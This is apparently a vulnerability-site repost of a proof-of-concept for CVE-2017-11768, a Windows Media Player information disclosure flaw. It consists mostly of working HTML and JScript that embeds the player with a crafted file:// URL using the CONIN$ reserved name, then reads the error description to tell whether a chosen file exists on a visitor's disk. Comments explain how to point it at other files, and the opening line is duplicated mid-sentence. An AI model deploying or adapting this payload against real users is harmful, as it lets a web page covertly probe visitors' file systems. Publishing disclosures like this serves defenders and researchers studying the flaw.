https://www.facebook.com/ExploitWareLabs/posts/1647568611973673
CVE-2017-11768 PoC code:
<b>existing file:</b>
<!-- "existing file:" with a bo https://www.facebook.com/ExploitWareLabs/posts/1647568611973673
CVE-2017-11768 PoC code:
<b>existing file:</b>
<!-- "existing file:" with a bold tag to present a Windows Media Player mp3
file is going to test for the presence of files on disk, in our case we are
detecting cmd.exe binary in system32 folder. -->
<br>
<br>
<OBJECT id="Player" classid="CLSID:6BF52A52-394A-11d3-B153-00C04F79FAA6">
<!-- Instantiating Specific class id - Windows Media Player HTMLView CLSID
"6BF52A52-394A-11d3-B153-00C04F79FAA6" to embed Windows Media Player. -->
<PARAM NAME="URL" VALUE="file://C://Windows//system32//cmd.exe//CONIN$.mp3">
<!-- Testing for the presence of files on disk via param.url. I added
"CONIN$.mp3" at the end of VALUE for valid detection, otherwise you'll get
prompt that says "doesn't match the file format". CONIN$ is a console input
device, the parameter of well known Windows function CreateFile. CONIN$ is
reserved name on Windows which mean it's invalid mp3 file name thus
bypasses prompt that checks extension. You can change param.url to your
desired file/folder to detect. -->
<param name="captioningID" value="displaylyric" />
<PARAM NAME="autoStart" VALUE="-1">
</OBJECT>
<SCRIPT LANGUAGE = "JScript" FOR = Player EVENT = error()>
if(Player.error.item(0).errorDescription.length==189){
alert('File not detected.');
}
else{
alert('File detected!');
}
</SCRIPT>
Windows Media Player Information Disclosure
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 308